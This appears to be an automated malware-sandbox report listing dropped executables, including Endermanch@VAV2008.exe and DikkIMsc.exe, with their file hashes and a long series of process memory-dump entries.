\Users\Admin\AppData\Local\Temp\Endermanch@VAV2008.exe
Filesize
770KB

MD5
8cd7c19b6dc76c116cdb84e369fd5d9a

SHA1
5e3ecd3e4ef8adc294db1e3525cdbde46b2b7ddc

SHA256
47769a82ac9994bf50fdb7ff521d2364775afea3da02d55450448a25e6f94645

SHA512
909d0a2ec4af33c374d7453926e5999badd2f9fa79d0648a7308f63911f673ae34ec275917999199e9fb3a669af5c4aa460e7639c5e346f261decd28b520039a

Download Submit
\Users\Admin\AppData\Local\Temp\Endermanch@VAV2008.exe
Filesize
770KB

MD5
8cd7c19b6dc76c116cdb84e369fd5d9a

SHA1
5e3ecd3e4ef8adc294db1e3525cdbde46b2b7ddc

SHA256
47769a82ac9994bf50fdb7ff521d2364775afea3da02d55450448a25e6f94645

SHA512
909d0a2ec4af33c374d7453926e5999badd2f9fa79d0648a7308f63911f673ae34ec275917999199e9fb3a669af5c4aa460e7639c5e346f261decd28b520039a

Download Submit
\Users\Admin\AppData\Local\Temp\Endermanch@VAV2008.exe
Filesize
770KB

MD5
8cd7c19b6dc76c116cdb84e369fd5d9a

SHA1
5e3ecd3e4ef8adc294db1e3525cdbde46b2b7ddc

SHA256
47769a82ac9994bf50fdb7ff521d2364775afea3da02d55450448a25e6f94645

SHA512
909d0a2ec4af33c374d7453926e5999badd2f9fa79d0648a7308f63911f673ae34ec275917999199e9fb3a669af5c4aa460e7639c5e346f261decd28b520039a

Download Submit
\Users\Admin\AppData\Local\Temp\is-COGBM.tmp\is-PBJJ2.tmp
Filesize
661KB

MD5
19672882daf21174647509b74a406a8c

SHA1
e3313b8741bd9bbe212fe53fcc55b342af5ae849

SHA256
34e6fea583cf1f995cf24e841da2060e0777405ac228094722f17f2e337ccea8

SHA512
eceddd4f1bbaf84dde72642f022b86033ba5a8b5105c573adcc49946d172e26e2512edce6f99e78dd3a2b0f8a23fa6138cca995a824e5f53a6ba925de434fa8f

Download Submit
\Users\Admin\WoIIwYkc\DikkIMsc.exe
Filesize
194KB

MD5
41d026963239e576d58f0a56d2cb0e97

SHA1
86b58f785fd03d9d55b84246471cce45e5cdc513

SHA256
66a411fee9b52e98fe01364ab2b87278b354a63810e1cf4ce94873633ec3329d

SHA512
f3b9d55265faafaada50253ef20b9ff0217422543942dc6f657e1df6a72e650685271282e27a42b1911dcb44be52cae2f5cafac5bfd94c450cc7359faf0bf345

Download Submit
\Users\Admin\WoIIwYkc\DikkIMsc.exe
Filesize
194KB

MD5
41d026963239e576d58f0a56d2cb0e97

SHA1
86b58f785fd03d9d55b84246471cce45e5cdc513

SHA256
66a411fee9b52e98fe01364ab2b87278b354a63810e1cf4ce94873633ec3329d

SHA512
f3b9d55265faafaada50253ef20b9ff0217422543942dc6f657e1df6a72e650685271282e27a42b1911dcb44be52cae2f5cafac5bfd94c450cc7359faf0bf345

Download Submit
memory/624-257-0x0000000001F00000-0x0000000001F68000-memory.dmp

Filesize
416KB

Download
memory/624-270-0x0000000001F00000-0x0000000001F68000-memory.dmp

Filesize
416KB

Download
memory/624-89-0x0000000000000000-mapping.dmp

Download
memory/672-168-0x0000000000000000-mapping.dmp

Download
memory/672-178-0x0000000000400000-0x0000000000433000-memory.dmp

Filesize
204KB

Download
memory/692-58-0x0000000000000000-mapping.dmp

Download
memory/692-60-0x0000000076961000-0x0000000076963000-memory.dmp

Filesize
8KB

Download
memory/744-182-0x0000000000000000-mapping.dmp

Download
memory/744-296-0x00000000001E0000-0x0000000000219000-memory.dmp

Filesize
228KB

Download
memory/744-297-0x00000000001E0000-0x0000000000219000-memory.dmp

Filesize
228KB

Download
memory/832-153-0x0000000000400000-0x0000000000CFB000-memory.dmp

Filesize
9.0MB

Download
memory/832-242-0x0000000000400000-0x0000000000CFB000-memory.dmp

Filesize
9.0MB

Download
memory/832-307-0x0000000000400000-0x0000000000CFB000-memory.dmp

Filesize
9.0MB

Download
memory/832-176-0x0000000000400000-0x0000000000CFB000-memory.dmp

Filesize
9.0MB

Download
memory/832-146-0x0000000000000000-mapping.dmp

Download
memory/832-294-0x0000000000400000-0x0000000000CFB000-memory.dmp

Filesize
9.0MB

Download
memory/832-268-0x0000000000400000-0x0000000000CFB000-memory.dmp

Filesize
9.0MB

Download
memory/860-108-0x0000000000000000-mapping.dmp

Download
memory/892-68-0x0000000000000000-mapping.dmp

Download
memory/952-143-0x0000000000000000-mapping.dmp

Download
memory/952-191-0x0000000000400000-0x0000000000415000-memory.dmp

Filesize
84KB

Download
memory/952-203-0x0000000000400000-0x0000000000415000-memory.dmp

Filesize
84KB

Download
memory/956-104-0x0000000000000000-mapping.dmp

Download
memory/964-77-0x0000000000000000-mapping.dmp

Download
memory/964-190-0x0000000000D60000-0x0000000000DE2000-memory.dmp

Filesize
520KB

Download
memory/988-300-0x0000000000000000-mapping.dmp

Download
memory/1000-61-0x0000000000000000-mapping.dmp

Download
memory/1048-173-0x0000000000400000-0x000000000043F000-memory.dmp

Filesize
252KB

Download
memory/1048-205-0x0000000000400000-0x000000000043F000-memory.dmp

Filesize
252KB

Download
memory/1048-135-0x0000000000000000-mapping.dmp

Download
memory/1048-223-0x0000000000400000-0x000000000043F000-memory.dmp

Filesize
252KB

Download
memory/1048-188-0x0000000000400000-0x000000000043F000-memory.dmp

Filesize
252KB

Download
memory/1048-174-0x0000000000230000-0x0000000000242000-memory.dmp

Filesize
72KB

Download
memory/1192-123-0x0000000000000000-mapping.dmp

Download
memory/1200-70-0x0000000000000000-mapping.dmp

Download
memory/1308-112-0x0000000000000000-mapping.dmp

Download
memory/1344-251-0x00000000002F0000-0x00000000003BE000-memory.dmp

Filesize
824KB

Download
memory/1344-249-0x0000000000400000-0x00000000005DE000-memory.dmp

Filesize
1.9MB

Download
memory/1344-127-0x0000000000000000-mapping.dmp

Download
memory/1404-278-0x0000000001000000-0x00000000010CE000-memory.dmp

Filesize
824KB

Download
memory/1404-116-0x0000000000000000-mapping.dmp

Download
memory/1404-287-0x0000000001000000-0x00000000010CE000-memory.dmp

Filesize
824KB

Download
memory/1404-132-0x0000000001000000-0x00000000010CE000-memory.dmp

Filesize
824KB

Download
memory/1440-122-0x0000000000A00000-0x0000000000A2E000-memory.dmp

Filesize
184KB

Download
memory/1440-115-0x0000000000000000-mapping.dmp

Download
memory/1440-224-0x000007FEFC591000-0x000007FEFC593000-memory.dmp

Filesize
8KB

Download
memory/1464-133-0x0000000000000000-mapping.dmp

Download
memory/1492-131-0x0000000000400000-0x0000000000450000-memory.dmp

Filesize
320KB

Download
memory/1492-75-0x0000000000000000-mapping.dmp

Download
memory/1492-130-0x0000000000120000-0x0000000000151000-memory.dmp

Filesize
196KB

Download
memory/1536-237-0x0000000000400000-0x0000000000439000-memory.dmp

Filesize
228KB

Download
memory/1536-139-0x0000000000000000-mapping.dmp

Download
memory/1536-172-0x00000000004B0000-0x00000000004E3000-memory.dmp

Filesize
204KB

Download
memory/1536-177-0x00000000004B0000-0x00000000004E3000-memory.dmp

Filesize
204KB

Download
memory/1536-170-0x00000000004B0000-0x00000000004E2000-memory.dmp

Filesize
200KB

Download
memory/1536-150-0x0000000000400000-0x0000000000439000-memory.dmp

Filesize
228KB

Download
memory/1536-158-0x00000000004B0000-0x00000000004E2000-memory.dmp

Filesize
200KB

Download
memory/1576-171-0x0000000000400000-0x0000000000432000-memory.dmp

Filesize
200KB

Download
memory/1576-160-0x0000000000000000-mapping.dmp

Download
memory/1588-163-0x0000000000000000-mapping.dmp

Download
memory/1588-166-0x0000000001020000-0x000000000115B000-memory.dmp

Filesize
1.2MB

Download
memory/1608-103-0x0000000000000000-mapping.dmp

Download
memory/1648-155-0x0000000000000000-mapping.dmp

Download
memory/1648-209-0x00000000004F0000-0x0000000000637000-memory.dmp

Filesize
1.3MB

Download
memory/1676-179-0x0000000000000000-mapping.dmp

Download
memory/1676-279-0x00000000034C0000-0x00000000034C3000-memory.dmp

Filesize
12KB

Download
memory/1676-187-0x0000000000400000-0x0000000000843000-memory.dmp

Filesize
4.3MB

Download
memory/1676-253-0x00000000009A0000-0x0000000000A00000-memory.dmp

Filesize
384KB

Download
memory/1684-175-0x0000000000000000-mapping.dmp

Download
memory/1700-83-0x0000000000000000-mapping.dmp

Download
memory/1748-193-0x00000000000D0000-0x00000000002C2000-memory.dmp

Filesize
1.9MB

Download
memory/1748-86-0x0000000000000000-mapping.dmp

Download
memory/1768-56-0x00000000004F0000-0x00000000004F6000-memory.dmp

Filesize
24KB

Download
memory/1768-57-0x0000000000550000-0x0000000000588000-memory.dmp

Filesize
224KB

Download
memory/1768-55-0x00000000003F0000-0x0000000000406000-memory.dmp

Filesize
88KB

Download
memory/1768-54-0x00000000001B0000-0x00000000001DC000-memory.dmp

Filesize
176KB

Download
memory/1800-97-0x00000000001B0000-0x00000000001B6000-memory.dmp

Filesize
24KB

Download
memory/1800-246-0x0000000000400000-0x0000000000438000-memory.dmp

Filesize
224KB

Download
memory/1800-73-0x0000000000000000-mapping.dmp

Download
memory/1800-94-0x0000000000400000-0x0000000000438000-memory.dmp

Filesize
224KB

Download
memory/1800-78-0x0000000000400000-0x0000000000438000-memory.dmp

Filesize
224KB

Download
memory/1832-281-0x0000000000000000-mapping.dmp

Download
memory/1884-101-0x0000000000400000-0x0000000000A06000-memory.dmp

Filesize
6.0MB

Download
memory/1884-121-0x0000000000400000-0x0000000000A06000-memory.dmp

Filesize
6.0MB

Download
memory/1884-250-0x0000000000400000-0x0000000000A06000-memory.dmp

Filesize
6.0MB

Download
memory/1884-64-0x0000000000000000-mapping.dmp

Download
memory/1884-100-0x0000000000400000-0x0000000000A06000-memory.dmp

Filesize
6.0MB

Download
memory/1980-291-0x0000000000400000-0x000000000054F000-memory.dmp

Filesize
1.3MB

Download
memory/1980-183-0x0000000000000000-mapping.dmp

Download
memory/1980-207-0x0000000000400000-0x000000000054F000-memory.dmp

Filesize
1.3MB

Download
memory/1980-206-0x00000000002D0000-0x0000000000337000-memory.dmp

Filesize
412KB

Download
memory/2016-149-0x0000000000000000-mapping.dmp

Download
memory/2020-154-0x00000000009E0000-0x0000000000A1C000-memory.dmp

Filesize
240KB

Download
memory/2020-92-0x0000000000000000-mapping.dmp

Download
memory/2060-221-0x00000000001D0000-0x00000000001F3000-memory.dmp

Filesize
140KB

Download
memory/2060-217-0x00000000001D0000-0x00000000001F3000-memory.dmp

Filesize
140KB

Download
memory/2060-219-0x00000000001D0000-0x00000000001F3000-memory.dmp

Filesize
140KB

Download
memory/2060-208-0x0000000000400000-0x0000000000423000-memory.dmp

Filesize
140KB

Download
memory/2060-198-0x0000000000000000-mapping.dmp

Download
memory/2080-197-0x0000000000000000-mapping.dmp

Download
memory/2140-293-0x0000000000000000-mapping.dmp

Download
memory/2144-204-0x0000000000000000-mapping.dmp

Download
memory/2164-283-0x0000000000000000-mapping.dmp

Download
memory/2164-298-0x0000000000400000-0x0000000000439000-memory.dmp

Filesize
228KB

Download
memory/2164-305-0x0000000000400000-0x0000000000439000-memory.dmp

Filesize
228KB

Download
memory/2168-284-0x0000000000400000-0x0000000000432000-memory.dmp

Filesize
200KB

Download
memory/2168-211-0x0000000000000000-mapping.dmp

Download
memory/2168-222-0x0000000000400000-0x0000000000432000-memory.dmp

Filesize
200KB

Download
memory/2212-216-0x0000000000000000-mapping.dmp

Download
memory/2224-288-0x0000000000000000-mapping.dmp

Download
memory/2244-218-0x0000000000000000-mapping.dmp

Download
memory/2244-260-0x0000000010000000-0x0000000010010000-memory.dmp

Filesize
64KB

Download
memory/2312-225-0x0000000000000000-mapping.dmp

Download
memory/2332-228-0x0000000000000000-mapping.dmp

Download
memory/2360-229-0x0000000000000000-mapping.dmp

Download
memory/2360-271-0x0000000000400000-0x000000000044F000-memory.dmp

Filesize
316KB

Download
memory/2360-236-0x0000000000400000-0x000000000044F000-memory.dmp

Filesize
316KB

Download
memory/2360-269-0x00000000001B0000-0x00000000001B3000-memory.dmp

Filesize
12KB

Download
memory/2372-292-0x0000000000000000-mapping.dmp

Download
memory/2404-233-0x0000000000000000-mapping.dmp

Download
memory/2404-282-0x0000000001EA0000-0x0000000001ED2000-memory.dmp

Filesize
200KB

Download
memory/2404-286-0x0000000001FF0000-0x0000000002022000-memory.dmp

Filesize
200KB

Download
memory/2488-238-0x0000000000000000-mapping.dmp

Download
memory/2504-240-0x0000000000000000-mapping.dmp

Download
memory/2536-241-0x0000000000000000-mapping.dmp

Download
memory/2568-299-0x0000000000000000-mapping.dmp

Download
memory/2580-245-0x0000000000000000-mapping.dmp

Download
memory/2608-244-0x0000000000000000-mapping.dmp

Download
memory/2688-255-0x0000000000000000-mapping.dmp

Download
memory/2712-254-0x0000000000000000-mapping.dmp

Download
memory/2780-295-0x0000000000400000-0x000000000054F000-memory.dmp

Filesize
1.3MB

Download
memory/2780-303-0x0000000000C30000-0x0000000000C89000-memory.dmp

Filesize
356KB

Download
memory/2780-304-0x0000000010000000-0x0000000010126000-memory.dmp

Filesize
1.1MB

Download
memory/2780-272-0x0000000000000000-mapping.dmp

Download
memory/2852-301-0x0000000000000000-mapping.dmp

Download
memory/2856-273-0x0000000000000000-mapping.dmp

Download
memory/2872-274-0x0000000000000000-mapping.dmp

Download
memory/2928-277-0x0000000000000000-mapping.dmp

Download
memory/3004-280-0x0000000000000000-mapping.dmp

Download